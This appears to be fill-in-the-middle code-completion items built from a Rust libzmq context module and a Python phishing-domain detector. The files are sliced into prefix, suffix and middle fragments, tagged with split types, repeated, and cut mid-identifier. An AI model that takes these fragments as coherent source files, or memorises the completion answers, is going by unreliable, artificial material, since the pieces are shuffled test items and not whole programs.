/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.io_threads(), 1);
///
/// // Lets say our app exclusively uses the inproc transport
/// // for messaging. Then we dont need any I/O threads.
/// ctx.set_io_threads(0)?;
/// assert_eq!(ctx.io_threads(), 0);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_io_threads(&self, nb_threads: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::IOThreads, nb_threads)
}
/// Returns the maximum number of sockets allowed for this context.
pub fn max_sockets(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxSockets)
}
/// Sets the maximum number of sockets allowed on the context.
///
/// # Default
/// The default value is `1023`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_sockets(), 1023);
///
/// ctx.set_max_sockets(420)?;
/// assert_eq!(ctx.max_sockets(), 420);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_sockets(&self, max: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxSockets, max)
}
/// Returns the maximum size of a message allowed for this context.
pub fn max_msg_size(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxMsgSize)
}
/// Sets the maximum allowed size of a message sent in the context.
///
/// # Default
/// The default value is `i32::max_value()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_msg_size(), i32::max_value());
///
/// ctx.set_max_msg_size(i32::max_value() - 1)?;
/// assert_eq!(ctx.max_msg_size(), i32::max_value() - 1);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_msg_size(&self, size: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxMsgSize, size)
}
/// Returns the largest number of sockets that the context will accept.
pub fn socket_limit(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::SocketLimit)
}
/// A value of `true` indicates that all new sockets are given a
/// linger timeout of zero.
///
pub fn no_linger(&self) -> bool {
!self.raw.as_ref().get_bool(RawCtxOption::Blocky)
}
/// When set to `true`, all new sockets are given a linger timeout
/// of zero.
///
/// # Default
/// The default value is `false`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.no_linger(), false);
///
/// ctx.set_no_linger(true)?;
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_no_linger(&self, enabled: bool) -> Result<(), Error> {
self.raw.as_ref().set_bool(RawCtxOption::Blocky, !enabled)
}
/// Shutdown the ØMQ context context.
///
/// Context shutdown will cause any blocking operations currently in
/// progress on sockets open within context to fail immediately with
/// [`CtxTerminated`].
///
/// Any further operations on sockets open within context shall fail with
/// with [`CtxTerminated`].
///
/// [`CtxTerminated`]: ../error/enum.ErrorKind.html#variant.CtxTerminated
pub fn shutdown(&self) {
self.raw.shutdown()
}
pub(crate) fn as_ptr(&self) -> *mut c_void {
self.raw.ctx
}
}
impl Default for Ctx {
fn default() -> Self {
Self::new()
}
}
impl<'a> From<&'a Ctx> for Ctx {
fn from(c: &'a Ctx) -> Ctx {
c.to_owned()
}
} | }
#[derive(Copy, Clone, Debug)]
enum RawCtxOption { | random_line_split |
ctx.rs | //! The ØMQ context type.
use crate::{auth::server::AuthServer, error::*};
use libzmq_sys as sys;
use sys::errno;
use lazy_static::lazy_static;
use serde::{Deserialize, Serialize};
use std::{
os::raw::{c_int, c_void},
ptr, str,
sync::Arc,
thread,
};
lazy_static! {
static ref GLOBAL_CONTEXT: Ctx = Ctx::new();
}
#[derive(Copy, Clone, Debug)]
enum RawCtxOption {
IOThreads,
MaxSockets,
MaxMsgSize,
SocketLimit,
IPV6,
Blocky,
}
impl From<RawCtxOption> for c_int {
fn from(r: RawCtxOption) -> c_int {
match r {
RawCtxOption::IOThreads => sys::ZMQ_IO_THREADS as c_int,
RawCtxOption::MaxSockets => sys::ZMQ_MAX_SOCKETS as c_int,
RawCtxOption::MaxMsgSize => sys::ZMQ_MAX_MSGSZ as c_int,
RawCtxOption::SocketLimit => sys::ZMQ_SOCKET_LIMIT as c_int,
RawCtxOption::IPV6 => sys::ZMQ_IPV6 as c_int,
RawCtxOption::Blocky => sys::ZMQ_BLOCKY as c_int,
}
}
}
#[derive(Debug)]
struct RawCtx {
ctx: *mut c_void,
}
impl RawCtx {
fn get(&self, option: RawCtxOption) -> i32 {
unsafe { sys::zmq_ctx_get(self.ctx, option.into()) }
}
fn set(&self, option: RawCtxOption, value: i32) -> Result<(), Error> {
let rc = unsafe { sys::zmq_ctx_set(self.ctx, option.into(), value) };
if rc == -1 {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINVAL => Err(Error::new(ErrorKind::InvalidInput {
msg: "invalid value",
})),
_ => panic!(msg_from_errno(errno)),
}
} else {
Ok(())
}
}
fn set_bool(&self, opt: RawCtxOption, flag: bool) -> Result<(), Error> {
self.set(opt, flag as i32)
}
fn get_bool(&self, opt: RawCtxOption) -> bool {
let flag = self.get(opt);
flag != 0
}
fn terminate(&self) {
// We loop in case `zmq_ctx_term` get interrupted by a signal.
loop {
let rc = unsafe { sys::zmq_ctx_term(self.ctx) };
if rc == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() {
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Usefull in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&mut self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn i | &mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enought.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds a `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx::global());
/// #
/// # Ok(())
/// # }
/// ```
pub fn global() -> &'static Ctx {
&GLOBAL_CONTEXT
}
/// Returns the size of the ØMQ thread pool for this context.
pub fn io_threads(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::IOThreads)
}
/// Set the size of the ØMQ thread pool to handle I/O operations.
///
/// "The general rule of thumb is to allow one I/O thread per gigabyte of
/// data in or out per second." - [`Pieter Hintjens`]
///
/// [`Pieter Hintjens`]: http://zguide.zeromq.org/page:all#I-O-Threads
///
/// # Default
/// The default value is `1`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.io_threads(), 1);
///
/// // Lets say our app exclusively uses the inproc transport
/// // for messaging. Then we dont need any I/O threads.
/// ctx.set_io_threads(0)?;
/// assert_eq!(ctx.io_threads(), 0);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_io_threads(&self, nb_threads: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::IOThreads, nb_threads)
}
/// Returns the maximum number of sockets allowed for this context.
pub fn max_sockets(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxSockets)
}
/// Sets the maximum number of sockets allowed on the context.
///
/// # Default
/// The default value is `1023`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_sockets(), 1023);
///
/// ctx.set_max_sockets(420)?;
/// assert_eq!(ctx.max_sockets(), 420);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_sockets(&self, max: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxSockets, max)
}
/// Returns the maximum size of a message allowed for this context.
pub fn max_msg_size(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxMsgSize)
}
/// Sets the maximum allowed size of a message sent in the context.
///
/// # Default
/// The default value is `i32::max_value()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_msg_size(), i32::max_value());
///
/// ctx.set_max_msg_size(i32::max_value() - 1)?;
/// assert_eq!(ctx.max_msg_size(), i32::max_value() - 1);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_msg_size(&self, size: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxMsgSize, size)
}
/// Returns the largest number of sockets that the context will accept.
pub fn socket_limit(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::SocketLimit)
}
/// A value of `true` indicates that all new sockets are given a
/// linger timeout of zero.
///
pub fn no_linger(&self) -> bool {
!self.raw.as_ref().get_bool(RawCtxOption::Blocky)
}
/// When set to `true`, all new sockets are given a linger timeout
/// of zero.
///
/// # Default
/// The default value is `false`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.no_linger(), false);
///
/// ctx.set_no_linger(true)?;
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_no_linger(&self, enabled: bool) -> Result<(), Error> {
self.raw.as_ref().set_bool(RawCtxOption::Blocky, !enabled)
}
/// Shutdown the ØMQ context context.
///
/// Context shutdown will cause any blocking operations currently in
/// progress on sockets open within context to fail immediately with
/// [`CtxTerminated`].
///
/// Any further operations on sockets open within context shall fail with
/// with [`CtxTerminated`].
///
/// [`CtxTerminated`]: ../error/enum.ErrorKind.html#variant.CtxTerminated
pub fn shutdown(&self) {
self.raw.shutdown()
}
pub(crate) fn as_ptr(&self) -> *mut c_void {
self.raw.ctx
}
}
impl Default for Ctx {
fn default() -> Self {
Self::new()
}
}
impl<'a> From<&'a Ctx> for Ctx {
fn from(c: &'a Ctx) -> Ctx {
c.to_owned()
}
}
| o_threads( | identifier_name |
common_domain_analyser.py | '''
Verify the domain against the list of most popular domains from OpenDNS
(https://github.com/opendns/public-domain-lists). Let's see how useful
it is to prevent phishing domains.
'''
from enum import Enum
import re
import tldextract
import wordsegment
from nostril import nonsense
import idna
from confusable_homoglyphs import confusables
import ahocorasick
from .base import Analyser
# Take a histogram here and find out the suitable value for this
BULK_DOMAIN_THRESHOLD = 15
# pylint: disable=too-few-public-methods
class AhoCorasickDomainMatching(Analyser):
'''
The domain and its SAN will be compared against the list of domains, for
example, the most popular domains from OpenDNS.
'''
# Get this number from the histogram of the length of all top domains
MIN_MATCHING_LENGTH = 3
# Some domains that don't work too well with tldextract and generate too
# many FPs
EXCLUDED_DOMAINS = {
'www': 1,
'web': 1,
}
# Some common domain parts that cause too many FP
IGNORED_PARTS = r'^(autodiscover\.|cpanel\.)'
def __init__(self, domains):
'''
Use Aho-Corasick to find the matching domain so we construct its Trie
here. Thought: How the f**k is com.com in the list?
'''
self.automaton = ahocorasick.Automaton()
self.domains = {}
for index, domain in enumerate(domains):
# Processing only the domain part. All sub-domains or TLDs will
# be ignored, for example:
# - www.google.com becomes google
# - www.google.co.uk becomes google
# - del.icio.us becomes icio
ext = tldextract.extract(domain)
if ext.domain in AhoCorasickDomainMatching.EXCLUDED_DOMAINS:
continue
self.automaton.add_word(ext.domain, (index, ext.domain))
self.domains[ext.domain] = domain
self.automaton.make_automaton()
def run(self, record):
'''
Use Aho-Corasick to find the matching domain. Check the time complexity
of this function later.
Tricky situation #1: When the string (domain) in the Trie is too short,
it could match many domains, for example, g.co or t.co. So they need
to be ignored somehow. Looking at the histogram of the length of all
domains in the list, there are only less than 100 domains with the
length of 2 or less. So we choose to ignore those. Also, we will
prefer longer match than a shorter one for now.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segment to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off cause it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
|
return record
class DomainMatchingOption(Enum):
'''
Control how strict we want to do our matching.
'''
# For example applefake.it will match with apple.com case ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar but use in instead of issubset so that the order is preserved
ORDER_MATCH = 1
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN name, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Use internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advance analysers to have their says in that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = True if len(record['all_domains']) >= self.threshold else False
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard cause it interfere with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Fail to decode the domain, just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be right done after IDNA conversion and
before other analysers so that they can get benefits from it.
'''
def __init__(self, greedy=False):
'''
We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using the confusable-homoglyphs, we are going to generate all alternatives ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we will only care about latin character
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
hg_map = {hg['character']: hg for hg in confusables.is_confusable(domain, greedy=True)}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decice to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is latin, we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the lengh of the homoglyph here cause
# confusable_homoglyphs library nicely returns multi-character
# match as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
'''
if index == len(alt_characters):
yield current
else:
for alt_c in alt_characters[index]:
yield from self._generate_alternatives(alt_characters,
index + 1,
current + alt_c)
class FeaturesGenerator(Analyser):
'''
Generate features to detect outliers in the stream. In our case, the outliers is
the 'suspicious' phishing domains.
'''
NOSTRIL_LENGTH_LIMIT = 6
# pylint: disable=invalid-name
def run(self, record):
'''
The list of features will be:
- The number of domain parts, for example, www.google.com is 3.
- The overall length in characters.
- The length of the longest domain part.
- The length of the TLD, e.g. .online or .download is longer than .com.
- The randomness level of the domain.
'''
if 'analysers' not in record:
record['analysers'] = []
x_samples = []
Y_samples = []
for analyser in record['analysers']:
if analyser['analyser'] != 'WordSegmentation':
continue
for domain, segments in analyser['output'].items():
# Remove wildcard domain
domain = re.sub(r'^\*\.', '', domain)
parts = domain.split('.')
x = []
# Compute the number of domain parts
x.append(len(parts))
# Compute the length of the whole domain
x.append(len(domain))
longest = ''
# Compute the length of the longest domain parts
for part in parts:
if len(part) > len(longest):
longest = part
x.append(len(longest))
# Compute the length of the TLD
x.append(len(parts[-1]))
randomness_count = 0
# The nostril package which we are using to detect non-sense words
# in the domain only returns a boolean verdict so may be we need to
# think of how we want to quantify this
for w in segments:
try:
if len(w) >= FeaturesGenerator.NOSTRIL_LENGTH_LIMIT and nonsense(w):
randomness_count += 1
except ValueError:
continue
x.append(randomness_count / len(segments))
x_samples.append(x)
Y_samples.append(True if 'usual_suspect' in record else False)
break
record['analysers'].append({
'analyser': type(self).__name__,
'output': x_samples,
})
return record
| record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
}) | conditional_block |
common_domain_analyser.py | '''
Verify the domain against the list of most popular domains from OpenDNS
(https://github.com/opendns/public-domain-lists). Let's see how useful
it is to prevent phishing domains.
'''
from enum import Enum
import re
import tldextract
import wordsegment
from nostril import nonsense
import idna
from confusable_homoglyphs import confusables
import ahocorasick
from .base import Analyser
# Take a histogram here and find out the suitable value for this
BULK_DOMAIN_THRESHOLD = 15
# pylint: disable=too-few-public-methods
class AhoCorasickDomainMatching(Analyser):
'''
The domain and its SAN will be compared against the list of domains, for
example, the most popular domains from OpenDNS.
'''
# Get this number from the histogram of the length of all top domains
MIN_MATCHING_LENGTH = 3
# Some domains that don't work too well with tldextract and generate too
# many FPs
EXCLUDED_DOMAINS = {
'www': 1,
'web': 1,
}
# Some common domain parts that cause too many FP
IGNORED_PARTS = r'^(autodiscover\.|cpanel\.)'
def __init__(self, domains):
'''
Use Aho-Corasick to find the matching domain so we construct its Trie
here. Thought: How the f**k is com.com in the list?
'''
self.automaton = ahocorasick.Automaton()
self.domains = {}
for index, domain in enumerate(domains):
# Processing only the domain part. All sub-domains or TLDs will
# be ignored, for example:
# - www.google.com becomes google
# - www.google.co.uk becomes google
# - del.icio.us becomes icio
ext = tldextract.extract(domain)
if ext.domain in AhoCorasickDomainMatching.EXCLUDED_DOMAINS:
continue
self.automaton.add_word(ext.domain, (index, ext.domain))
self.domains[ext.domain] = domain
self.automaton.make_automaton()
def run(self, record):
'''
Use Aho-Corasick to find the matching domain. Check the time complexity
of this function later.
Tricky situation #1: When the string (domain) in the Trie is too short,
it could match many domains, for example, g.co or t.co. So they need
to be ignored somehow. Looking at the histogram of the length of all
domains in the list, there are only less than 100 domains with the
length of 2 or less. So we choose to ignore those. Also, we will
prefer longer match than a shorter one for now.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
